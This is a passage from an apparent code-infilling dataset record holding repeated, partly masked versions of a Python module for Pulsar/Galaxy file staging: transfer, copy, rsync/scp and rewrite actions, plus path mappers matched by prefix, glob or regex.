self._path_matches(path)\n return rval\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(action=self.action_type, path_types=','.join(self.\n path_types), match_type=self.match_type)\n base_dict.update(self.file_lister.to_dict())\n base_dict.update(self.action_kwds)\n base_dict.update(**kwds)\n return base_dict\n\n def to_pattern(self):\n raise NotImplementedError()\n\n\nclass PathTypeOnlyMapper(BasePathMapper):\n match_type = 'path_type_only'\n\n def __init__(self, config):\n super().__init__(config)\n\n def _path_matches(self, path):\n return True\n\n def to_dict(self):\n return self._extend_base_dict()\n\n\nclass PrefixPathMapper(BasePathMapper):\n match_type = 'prefix'\n\n def __init__(self, config):\n super().__init__(config)\n self.prefix_path = abspath(config['path'])\n\n def _path_matches(self, path):\n return path is not None and path.startswith(self.prefix_path)\n\n def to_pattern(self):\n pattern_str = '({}{}[^\\\\s,\\\\\"\\\\\\']+)'.format(escape(self.\n prefix_path), escape(sep))\n return compile(pattern_str)\n\n def to_dict(self):\n return self._extend_base_dict(path=self.prefix_path)\n\n\nclass GlobPathMapper(BasePathMapper):\n match_type = 'glob'\n\n def __init__(self, config):\n super().__init__(config)\n self.glob_path = config['path']\n\n def _path_matches(self, path):\n return path is not None and fnmatch.fnmatch(path, self.glob_path)\n\n def to_pattern(self):\n return compile(fnmatch.translate(self.glob_path))\n\n def to_dict(self):\n return self._extend_base_dict(path=self.glob_path)\n\n\nclass RegexPathMapper(BasePathMapper):\n match_type = 'regex'\n\n def __init__(self, config):\n super().__init__(config)\n self.pattern_raw = config['path']\n self.pattern = compile(self.pattern_raw)\n\n def _path_matches(self, path):\n return path is not None and self.pattern.match(path) is not None\n\n def to_pattern(self):\n return self.pattern\n\n def to_dict(self):\n return self._extend_base_dict(path=self.pattern_raw)\n\n\n<mask token>\n\n\nclass FileLister:\n\n def __init__(self, config):\n self.depth = int(config.get('depth', '0'))\n\n def to_dict(self):\n return dict(depth=self.depth)\n\n def unstructured_map(self, path):\n depth = self.depth\n if self.depth == 0:\n return {path: basename(path)}\n else:\n while depth > 0:\n path = dirname(path)\n depth -= 1\n return {join(path, f): f for f in directory_files(path)}\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass NoneAction(BaseAction):\n <mask token>\n action_type = 'none'\n staging = STAGING_ACTION_NONE\n\n def to_dict(self):\n return self._extend_base_dict()\n\n @classmethod\n def from_dict(cls, action_dict):\n return NoneAction(source=action_dict['source'])\n\n def path_rewrite(self, path_helper, path=None):\n return None\n\n\nclass RewriteAction(BaseAction):\n \"\"\" This actin indicates the Pulsar server should simply rewrite the path\n to the specified file.\n \"\"\"\n action_spec = dict(source_directory=REQUIRED_ACTION_KWD,\n destination_directory=REQUIRED_ACTION_KWD)\n action_type = 'rewrite'\n staging = STAGING_ACTION_NONE\n\n def __init__(self, source, file_lister=None, source_directory=None,\n destination_directory=None):\n super().__init__(source, file_lister=file_lister)\n self.source_directory = source_directory\n self.destination_directory = destination_directory\n\n def to_dict(self):\n return self._extend_base_dict(source_directory=self.\n source_directory, destination_directory=self.destination_directory)\n\n @classmethod\n def from_dict(cls, action_dict):\n return 
RewriteAction(source=action_dict['source'], source_directory\n =action_dict['source_directory'], destination_directory=\n action_dict['destination_directory'])\n\n def path_rewrite(self, path_helper, path=None):\n if not path:\n path = self.path\n new_path = path_helper.from_posix_with_new_base(self.path, self.\n source_directory, self.destination_directory)\n return None if new_path == self.path else new_path\n\n\nclass TransferAction(BaseAction):\n \"\"\" This actions indicates that the Pulsar client should initiate an HTTP\n transfer of the corresponding path to the remote Pulsar server before\n launching the job. \"\"\"\n action_type = 'transfer'\n staging = STAGING_ACTION_LOCAL\n\n\nclass CopyAction(BaseAction):\n \"\"\" This action indicates that the Pulsar client should execute a file system\n copy of the corresponding path to the Pulsar staging directory prior to\n launching the corresponding job. \"\"\"\n action_type = 'copy'\n staging = STAGING_ACTION_LOCAL\n\n\nclass RemoteCopyAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should copy the file before\n execution via direct file system copy. This is like a CopyAction, but\n it indicates the action should occur on the Pulsar server instead of on\n the client.\n \"\"\"\n action_type = 'remote_copy'\n staging = STAGING_ACTION_REMOTE\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n copy_to_path(open(self.path, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n destination = self.path\n parent_directory = dirname(destination)\n if not exists(parent_directory):\n makedirs(parent_directory)\n with open(pulsar_path, 'rb') as f:\n copy_to_path(f, destination)\n\n\nclass RemoteTransferAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should transfer the file before\n execution via one of the remote transfer implementations. 
This is like a TransferAction, but\n it indicates the action requires network access to the staging server, and\n should be executed via ssh/rsync/etc\n \"\"\"\n inject_url = True\n action_type = 'remote_transfer'\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, url=None):\n super().__init__(source, file_lister=file_lister)\n self.url = url\n\n def to_dict(self):\n return self._extend_base_dict(url=self.url)\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteTransferAction(source=action_dict['source'], url=\n action_dict['url'])\n\n def write_to_path(self, path):\n get_file(self.url, path)\n\n def write_from_path(self, pulsar_path):\n post_file(self.url, pulsar_path)\n\n\nclass RemoteObjectStoreCopyAction(BaseAction):\n \"\"\"\n \"\"\"\n action_type = 'remote_object_store_copy'\n staging = STAGING_ACTION_REMOTE\n inject_object_store = True\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteObjectStoreCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n assert self.object_store\n assert 'object_store_ref' in self.source\n object_store_ref = self.source['object_store_ref']\n dataset_object = Bunch(id=object_store_ref['dataset_id'], uuid=\n object_store_ref['dataset_uuid'], object_store_id=\n object_store_ref['object_store_id'])\n filename = self.object_store.get_filename(dataset_object)\n copy_to_path(open(filename, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n raise NotImplementedError(\n 'Writing raw files to object store not supported at this time.')\n\n\nclass PubkeyAuthenticatedTransferAction(BaseAction):\n \"\"\"Base class for file transfers requiring an SSH public/private key\n \"\"\"\n inject_ssh_properties = True\n action_spec = dict(ssh_key=UNSET_ACTION_KWD, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD)\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ssh_key=\n UNSET_ACTION_KWD):\n super().__init__(source, file_lister=file_lister)\n self.ssh_user = ssh_user\n self.ssh_host = ssh_host\n self.ssh_port = ssh_port\n self.ssh_key = ssh_key\n\n def to_dict(self):\n return self._extend_base_dict(ssh_user=self.ssh_user, ssh_host=self\n .ssh_host, ssh_port=self.ssh_port)\n\n @contextmanager\n def _serialized_key(self):\n key_file = self.__serialize_ssh_key()\n yield key_file\n self.__cleanup_ssh_key(key_file)\n\n def __serialize_ssh_key(self):\n f = tempfile.NamedTemporaryFile(delete=False)\n if self.ssh_key is not None:\n f.write(self.ssh_key.encode('utf-8'))\n else:\n raise Exception('SSH_KEY not available')\n return f.name\n\n def __cleanup_ssh_key(self, keyfile):\n if exists(keyfile):\n unlink(keyfile)\n\n\nclass RsyncTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_rsync_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return RsyncTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n rsync_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n rsync_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass 
ScpTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_scp_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return ScpTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n scp_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n scp_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass MessageAction:\n \"\"\" Sort of pseudo action describing \"files\" store in memory and\n transferred via message (HTTP, Python-call, MQ, etc...)\n \"\"\"\n action_type = 'message'\n staging = STAGING_ACTION_DEFAULT\n\n def __init__(self, contents, client=None):\n self.contents = contents\n self.client = client\n\n @property\n def staging_needed(self):\n return True\n\n @property\n def staging_action_local(self):\n return self.client.prefer_local_staging\n\n def to_dict(self):\n return dict(contents=self.contents, action_type=MessageAction.\n action_type)\n\n @classmethod\n def from_dict(cls, action_dict):\n return MessageAction(contents=action_dict['contents'])\n\n def write_to_path(self, path):\n open(path, 'w').write(self.contents)\n\n\n<mask token>\n\n\nclass BasePathMapper:\n match_type: str\n\n def __init__(self, config):\n action_type = config.get('action', DEFAULT_MAPPED_ACTION)\n action_class = actions.get(action_type, None)\n action_kwds = action_class.action_spec.copy()\n for key, value in action_kwds.items():\n if key in config:\n action_kwds[key] = config[key]\n elif value is REQUIRED_ACTION_KWD:\n message_template = (\n 'action_type %s requires key word argument %s')\n message = message_template % (action_type, key)\n raise Exception(message)\n else:\n action_kwds[key] = value\n self.action_type = action_type\n self.action_kwds = action_kwds\n path_types_str = config.get('path_types', '*defaults*')\n path_types_str = path_types_str.replace('*defaults*', ','.join(\n ACTION_DEFAULT_PATH_TYPES))\n path_types_str = path_types_str.replace('*any*', ','.join(\n ALL_PATH_TYPES))\n self.path_types = path_types_str.split(',')\n self.file_lister = FileLister(config)\n\n def matches(self, path, path_type):\n path_type_matches = path_type in self.path_types\n rval = path_type_matches and self._path_matches(path)\n return rval\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(action=self.action_type, path_types=','.join(self.\n path_types), match_type=self.match_type)\n base_dict.update(self.file_lister.to_dict())\n base_dict.update(self.action_kwds)\n base_dict.update(**kwds)\n return base_dict\n\n def to_pattern(self):\n raise NotImplementedError()\n\n\nclass PathTypeOnlyMapper(BasePathMapper):\n match_type = 'path_type_only'\n\n def __init__(self, config):\n super().__init__(config)\n\n def _path_matches(self, path):\n return True\n\n def to_dict(self):\n return self._extend_base_dict()\n\n\nclass PrefixPathMapper(BasePathMapper):\n match_type = 'prefix'\n\n def __init__(self, config):\n super().__init__(config)\n self.prefix_path = abspath(config['path'])\n\n def _path_matches(self, path):\n return path is not None and path.startswith(self.prefix_path)\n\n def to_pattern(self):\n pattern_str = '({}{}[^\\\\s,\\\\\"\\\\\\']+)'.format(escape(self.\n prefix_path), escape(sep))\n return 
compile(pattern_str)\n\n def to_dict(self):\n return self._extend_base_dict(path=self.prefix_path)\n\n\nclass GlobPathMapper(BasePathMapper):\n match_type = 'glob'\n\n def __init__(self, config):\n super().__init__(config)\n self.glob_path = config['path']\n\n def _path_matches(self, path):\n return path is not None and fnmatch.fnmatch(path, self.glob_path)\n\n def to_pattern(self):\n return compile(fnmatch.translate(self.glob_path))\n\n def to_dict(self):\n return self._extend_base_dict(path=self.glob_path)\n\n\nclass RegexPathMapper(BasePathMapper):\n match_type = 'regex'\n\n def __init__(self, config):\n super().__init__(config)\n self.pattern_raw = config['path']\n self.pattern = compile(self.pattern_raw)\n\n def _path_matches(self, path):\n return path is not None and self.pattern.match(path) is not None\n\n def to_pattern(self):\n return self.pattern\n\n def to_dict(self):\n return self._extend_base_dict(path=self.pattern_raw)\n\n\n<mask token>\n\n\nclass FileLister:\n\n def __init__(self, config):\n self.depth = int(config.get('depth', '0'))\n\n def to_dict(self):\n return dict(depth=self.depth)\n\n def unstructured_map(self, path):\n depth = self.depth\n if self.depth == 0:\n return {path: basename(path)}\n else:\n while depth > 0:\n path = dirname(path)\n depth -= 1\n return {join(path, f): f for f in directory_files(path)}\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\nclass FileActionMapper:\n \"\"\"\n Objects of this class define how paths are mapped to actions.\n\n >>> json_string = r'''{\"paths\": [ {\"path\": \"/opt/galaxy\", \"action\": \"none\"}, {\"path\": \"/galaxy/data\", \"action\": \"transfer\"}, {\"path\": \"/cool/bamfiles/**/*.bam\", \"action\": \"copy\", \"match_type\": \"glob\"}, {\"path\": \".*/dataset_\\\\\\\\d+.dat\", \"action\": \"copy\", \"match_type\": \"regex\"} ]}'''\n >>> from tempfile import NamedTemporaryFile\n >>> from os import unlink\n >>> def mapper_for(default_action, config_contents):\n ... f = NamedTemporaryFile(delete=False)\n ... f.write(config_contents.encode('UTF-8'))\n ... f.close()\n ... mock_client = Bunch(default_file_action=default_action, action_config_path=f.name, files_endpoint=None)\n ... mapper = FileActionMapper(mock_client)\n ... as_dict = config=mapper.to_dict()\n ... mapper = FileActionMapper(config=as_dict) # Serialize and deserialize it to make sure still works\n ... unlink(f.name)\n ... 
return mapper\n >>> mapper = mapper_for(default_action='none', config_contents=json_string)\n >>> # Test first config line above, implicit path prefix mapper\n >>> action = mapper.action({'path': '/opt/galaxy/tools/filters/catWrapper.py'}, 'input')\n >>> action.action_type == u'none'\n True\n >>> action.staging_needed\n False\n >>> # Test another (2nd) mapper, this one with a different action\n >>> action = mapper.action({'path': '/galaxy/data/files/000/dataset_1.dat'}, 'input')\n >>> action.action_type == u'transfer'\n True\n >>> action.staging_needed\n True\n >>> # Always at least copy work_dir outputs.\n >>> action = mapper.action({'path': '/opt/galaxy/database/working_directory/45.sh'}, 'workdir')\n >>> action.action_type == u'copy'\n True\n >>> action.staging_needed\n True\n >>> # Test glob mapper (matching test)\n >>> mapper.action({'path': '/cool/bamfiles/projectABC/study1/patient3.bam'}, 'input').action_type == u'copy'\n True\n >>> # Test glob mapper (non-matching test)\n >>> mapper.action({'path': '/cool/bamfiles/projectABC/study1/patient3.bam.bai'}, 'input').action_type == u'none'\n True\n >>> # Regex mapper test.\n >>> mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'input').action_type == u'copy'\n True\n >>> # Doesn't map unstructured paths by default\n >>> mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'unstructured').action_type == u'none'\n True\n >>> input_only_mapper = mapper_for(default_action=\"none\", config_contents=r'''{\"paths\": [ {\"path\": \"/\", \"action\": \"transfer\", \"path_types\": \"input\"} ] }''')\n >>> input_only_mapper.action({'path': '/dataset_1.dat'}, 'input').action_type == u'transfer'\n True\n >>> input_only_mapper.action({'path': '/dataset_1.dat'}, 'output').action_type == u'none'\n True\n >>> unstructured_mapper = mapper_for(default_action=\"none\", config_contents=r'''{\"paths\": [ {\"path\": \"/\", \"action\": \"transfer\", \"path_types\": \"*any*\"} ] }''')\n >>> unstructured_mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'unstructured').action_type == u'transfer'\n True\n >>> match_type_only_mapper = mapper_for(default_action=\"none\", config_contents=r'''{\"paths\": [ {\"action\": \"transfer\", \"path_types\": \"input\"}, {\"action\": \"remote_copy\", \"path_types\": \"output\"} ] }''')\n >>> input_action = match_type_only_mapper.action({}, 'input')\n >>> input_action.action_type\n 'transfer'\n >>> output_action = match_type_only_mapper.action({}, 'output')\n >>> output_action.action_type\n 'remote_copy'\n \"\"\"\n\n def __init__(self, client=None, config=None):\n if config is None and client is None:\n message = (\n 'FileActionMapper must be constructed from either a client or a config dictionary.'\n )\n raise Exception(message)\n if config is None:\n config = self.__client_to_config(client)\n self.default_action = config.get('default_action', 'transfer')\n self.ssh_key = config.get('ssh_key', None)\n self.ssh_user = config.get('ssh_user', None)\n self.ssh_host = config.get('ssh_host', None)\n self.ssh_port = config.get('ssh_port', None)\n self.mappers = mappers_from_dicts(config.get('paths', []))\n self.files_endpoint = config.get('files_endpoint', None)\n\n def action(self, source, type, mapper=None):\n path = source.get('path', None)\n mapper = self.__find_mapper(path, type, mapper)\n action_class = self.__action_class(path, type, mapper)\n file_lister = DEFAULT_FILE_LISTER\n action_kwds = {}\n if mapper:\n file_lister = mapper.file_lister\n action_kwds = mapper.action_kwds\n action = 
action_class(source, file_lister=file_lister, **action_kwds)\n self.__process_action(action, type)\n return action\n\n def unstructured_mappers(self):\n \"\"\" Return mappers that will map 'unstructured' files (i.e. go beyond\n mapping inputs, outputs, and config files).\n \"\"\"\n return filter(lambda m: path_type.UNSTRUCTURED in m.path_types,\n self.mappers)\n\n def to_dict(self):\n return dict(default_action=self.default_action, files_endpoint=self\n .files_endpoint, ssh_key=self.ssh_key, ssh_user=self.ssh_user,\n ssh_port=self.ssh_port, ssh_host=self.ssh_host, paths=list(map(\n lambda m: m.to_dict(), self.mappers)))\n\n def __client_to_config(self, client):\n action_config_path = client.action_config_path\n if action_config_path:\n config = read_file(action_config_path)\n else:\n config = getattr(client, 'file_actions', {})\n config['default_action'] = client.default_file_action\n config['files_endpoint'] = client.files_endpoint\n for attr in ['ssh_key', 'ssh_user', 'ssh_port', 'ssh_host']:\n if hasattr(client, attr):\n config[attr] = getattr(client, attr)\n return config\n\n def __find_mapper(self, path, type, mapper=None):\n if not mapper:\n if path is not None:\n normalized_path = abspath(path)\n else:\n normalized_path = None\n for query_mapper in self.mappers:\n if query_mapper.matches(normalized_path, type):\n mapper = query_mapper\n break\n return mapper\n\n def __action_class(self, path, type, mapper):\n action_type = (self.default_action if type in\n ACTION_DEFAULT_PATH_TYPES else 'none')\n if mapper:\n action_type = mapper.action_type\n if type in ['workdir', 'jobdir', 'output_workdir',\n 'output_metadata', 'output_jobdir'] and action_type == 'none':\n action_type = 'copy'\n action_class = actions.get(action_type, None)\n if action_class is None:\n message_template = (\n 'Unknown action_type encountered %s while trying to map path %s'\n )\n message_args = action_type, path\n raise Exception(message_template % message_args)\n return action_class\n\n def __process_action(self, action, file_type):\n \"\"\" Extension point to populate extra action information after an\n action has been created.\n \"\"\"\n if getattr(action, 'inject_url', False):\n self.__inject_url(action, file_type)\n if getattr(action, 'inject_ssh_properties', False):\n self.__inject_ssh_properties(action)\n\n def __inject_url(self, action, file_type):\n url_base = self.files_endpoint\n if not url_base:\n raise Exception(MISSING_FILES_ENDPOINT_ERROR)\n if '?' not in url_base:\n url_base = '%s?' 
% url_base\n else:\n url_base = '%s&' % url_base\n url_params = urlencode({'path': action.path, 'file_type': file_type})\n action.url = f'{url_base}{url_params}'\n\n def __inject_ssh_properties(self, action):\n for attr in ['ssh_key', 'ssh_host', 'ssh_port', 'ssh_user']:\n action_attr = getattr(action, attr)\n if action_attr == UNSET_ACTION_KWD:\n client_default_attr = getattr(self, attr, None)\n setattr(action, attr, client_default_attr)\n if action.ssh_key is None:\n raise Exception(MISSING_SSH_KEY_ERROR)\n\n\n<mask token>\n\n\nclass BaseAction:\n whole_directory_transfer_supported = False\n action_spec: Dict[str, Any] = {}\n action_type: str\n\n def __init__(self, source, file_lister=None):\n self.source = source\n self.file_lister = file_lister or DEFAULT_FILE_LISTER\n\n @property\n def path(self):\n return self.source.get('path')\n\n def unstructured_map(self, path_helper):\n unstructured_map = self.file_lister.unstructured_map(self.path)\n if self.staging_needed:\n prefix = unique_path_prefix(self.path)\n for path, name in unstructured_map.items():\n unstructured_map[path] = join(prefix, name)\n else:\n path_rewrites = {}\n for path in unstructured_map:\n rewrite = self.path_rewrite(path_helper, path)\n if rewrite:\n path_rewrites[path] = rewrite\n unstructured_map = path_rewrites\n return unstructured_map\n\n @property\n def staging_needed(self):\n return self.staging != STAGING_ACTION_NONE\n\n @property\n def staging_action_local(self):\n return self.staging == STAGING_ACTION_LOCAL\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(path=self.path, source=self.source, action_type=\n self.action_type)\n base_dict.update(**kwds)\n return base_dict\n\n def to_dict(self):\n return self._extend_base_dict()\n\n def __str__(self):\n as_dict = self.to_dict()\n attribute_str = ''\n first = True\n for key, value in as_dict.items():\n if key == 'source':\n continue\n if first:\n first = False\n else:\n attribute_str += ','\n attribute_str += '{}={}'.format(key, value)\n return 'FileAction[%s]' % attribute_str\n\n\nclass NoneAction(BaseAction):\n \"\"\" This action indicates the corresponding path does not require any\n additional action. This should indicate paths that are available both on\n the Pulsar client (i.e. Galaxy server) and remote Pulsar server with the same\n paths. 
\"\"\"\n action_type = 'none'\n staging = STAGING_ACTION_NONE\n\n def to_dict(self):\n return self._extend_base_dict()\n\n @classmethod\n def from_dict(cls, action_dict):\n return NoneAction(source=action_dict['source'])\n\n def path_rewrite(self, path_helper, path=None):\n return None\n\n\nclass RewriteAction(BaseAction):\n \"\"\" This actin indicates the Pulsar server should simply rewrite the path\n to the specified file.\n \"\"\"\n action_spec = dict(source_directory=REQUIRED_ACTION_KWD,\n destination_directory=REQUIRED_ACTION_KWD)\n action_type = 'rewrite'\n staging = STAGING_ACTION_NONE\n\n def __init__(self, source, file_lister=None, source_directory=None,\n destination_directory=None):\n super().__init__(source, file_lister=file_lister)\n self.source_directory = source_directory\n self.destination_directory = destination_directory\n\n def to_dict(self):\n return self._extend_base_dict(source_directory=self.\n source_directory, destination_directory=self.destination_directory)\n\n @classmethod\n def from_dict(cls, action_dict):\n return RewriteAction(source=action_dict['source'], source_directory\n =action_dict['source_directory'], destination_directory=\n action_dict['destination_directory'])\n\n def path_rewrite(self, path_helper, path=None):\n if not path:\n path = self.path\n new_path = path_helper.from_posix_with_new_base(self.path, self.\n source_directory, self.destination_directory)\n return None if new_path == self.path else new_path\n\n\nclass TransferAction(BaseAction):\n \"\"\" This actions indicates that the Pulsar client should initiate an HTTP\n transfer of the corresponding path to the remote Pulsar server before\n launching the job. \"\"\"\n action_type = 'transfer'\n staging = STAGING_ACTION_LOCAL\n\n\nclass CopyAction(BaseAction):\n \"\"\" This action indicates that the Pulsar client should execute a file system\n copy of the corresponding path to the Pulsar staging directory prior to\n launching the corresponding job. \"\"\"\n action_type = 'copy'\n staging = STAGING_ACTION_LOCAL\n\n\nclass RemoteCopyAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should copy the file before\n execution via direct file system copy. This is like a CopyAction, but\n it indicates the action should occur on the Pulsar server instead of on\n the client.\n \"\"\"\n action_type = 'remote_copy'\n staging = STAGING_ACTION_REMOTE\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n copy_to_path(open(self.path, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n destination = self.path\n parent_directory = dirname(destination)\n if not exists(parent_directory):\n makedirs(parent_directory)\n with open(pulsar_path, 'rb') as f:\n copy_to_path(f, destination)\n\n\nclass RemoteTransferAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should transfer the file before\n execution via one of the remote transfer implementations. 
This is like a TransferAction, but\n it indicates the action requires network access to the staging server, and\n should be executed via ssh/rsync/etc\n \"\"\"\n inject_url = True\n action_type = 'remote_transfer'\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, url=None):\n super().__init__(source, file_lister=file_lister)\n self.url = url\n\n def to_dict(self):\n return self._extend_base_dict(url=self.url)\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteTransferAction(source=action_dict['source'], url=\n action_dict['url'])\n\n def write_to_path(self, path):\n get_file(self.url, path)\n\n def write_from_path(self, pulsar_path):\n post_file(self.url, pulsar_path)\n\n\nclass RemoteObjectStoreCopyAction(BaseAction):\n \"\"\"\n \"\"\"\n action_type = 'remote_object_store_copy'\n staging = STAGING_ACTION_REMOTE\n inject_object_store = True\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteObjectStoreCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n assert self.object_store\n assert 'object_store_ref' in self.source\n object_store_ref = self.source['object_store_ref']\n dataset_object = Bunch(id=object_store_ref['dataset_id'], uuid=\n object_store_ref['dataset_uuid'], object_store_id=\n object_store_ref['object_store_id'])\n filename = self.object_store.get_filename(dataset_object)\n copy_to_path(open(filename, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n raise NotImplementedError(\n 'Writing raw files to object store not supported at this time.')\n\n\nclass PubkeyAuthenticatedTransferAction(BaseAction):\n \"\"\"Base class for file transfers requiring an SSH public/private key\n \"\"\"\n inject_ssh_properties = True\n action_spec = dict(ssh_key=UNSET_ACTION_KWD, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD)\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ssh_key=\n UNSET_ACTION_KWD):\n super().__init__(source, file_lister=file_lister)\n self.ssh_user = ssh_user\n self.ssh_host = ssh_host\n self.ssh_port = ssh_port\n self.ssh_key = ssh_key\n\n def to_dict(self):\n return self._extend_base_dict(ssh_user=self.ssh_user, ssh_host=self\n .ssh_host, ssh_port=self.ssh_port)\n\n @contextmanager\n def _serialized_key(self):\n key_file = self.__serialize_ssh_key()\n yield key_file\n self.__cleanup_ssh_key(key_file)\n\n def __serialize_ssh_key(self):\n f = tempfile.NamedTemporaryFile(delete=False)\n if self.ssh_key is not None:\n f.write(self.ssh_key.encode('utf-8'))\n else:\n raise Exception('SSH_KEY not available')\n return f.name\n\n def __cleanup_ssh_key(self, keyfile):\n if exists(keyfile):\n unlink(keyfile)\n\n\nclass RsyncTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_rsync_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return RsyncTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n rsync_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n rsync_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass 
ScpTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_scp_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return ScpTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n scp_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n scp_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass MessageAction:\n \"\"\" Sort of pseudo action describing \"files\" store in memory and\n transferred via message (HTTP, Python-call, MQ, etc...)\n \"\"\"\n action_type = 'message'\n staging = STAGING_ACTION_DEFAULT\n\n def __init__(self, contents, client=None):\n self.contents = contents\n self.client = client\n\n @property\n def staging_needed(self):\n return True\n\n @property\n def staging_action_local(self):\n return self.client.prefer_local_staging\n\n def to_dict(self):\n return dict(contents=self.contents, action_type=MessageAction.\n action_type)\n\n @classmethod\n def from_dict(cls, action_dict):\n return MessageAction(contents=action_dict['contents'])\n\n def write_to_path(self, path):\n open(path, 'w').write(self.contents)\n\n\n<mask token>\n\n\ndef from_dict(action_dict):\n action_type = action_dict.get('action_type', None)\n target_class = None\n for action_class in DICTIFIABLE_ACTION_CLASSES:\n if action_type == action_class.action_type:\n target_class = action_class\n if not target_class:\n message = (\n 'Failed to recover action from dictionary - invalid action type specified %s.'\n % action_type)\n raise Exception(message)\n if 'source' in action_dict:\n action_dict.pop('path')\n elif 'path' in action_dict:\n source = {'path': action_dict.pop('path')}\n action_dict['source'] = source\n return target_class.from_dict(action_dict)\n\n\nclass BasePathMapper:\n match_type: str\n\n def __init__(self, config):\n action_type = config.get('action', DEFAULT_MAPPED_ACTION)\n action_class = actions.get(action_type, None)\n action_kwds = action_class.action_spec.copy()\n for key, value in action_kwds.items():\n if key in config:\n action_kwds[key] = config[key]\n elif value is REQUIRED_ACTION_KWD:\n message_template = (\n 'action_type %s requires key word argument %s')\n message = message_template % (action_type, key)\n raise Exception(message)\n else:\n action_kwds[key] = value\n self.action_type = action_type\n self.action_kwds = action_kwds\n path_types_str = config.get('path_types', '*defaults*')\n path_types_str = path_types_str.replace('*defaults*', ','.join(\n ACTION_DEFAULT_PATH_TYPES))\n path_types_str = path_types_str.replace('*any*', ','.join(\n ALL_PATH_TYPES))\n self.path_types = path_types_str.split(',')\n self.file_lister = FileLister(config)\n\n def matches(self, path, path_type):\n path_type_matches = path_type in self.path_types\n rval = path_type_matches and self._path_matches(path)\n return rval\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(action=self.action_type, path_types=','.join(self.\n path_types), match_type=self.match_type)\n base_dict.update(self.file_lister.to_dict())\n base_dict.update(self.action_kwds)\n base_dict.update(**kwds)\n return base_dict\n\n def to_pattern(self):\n raise NotImplementedError()\n\n\nclass PathTypeOnlyMapper(BasePathMapper):\n 
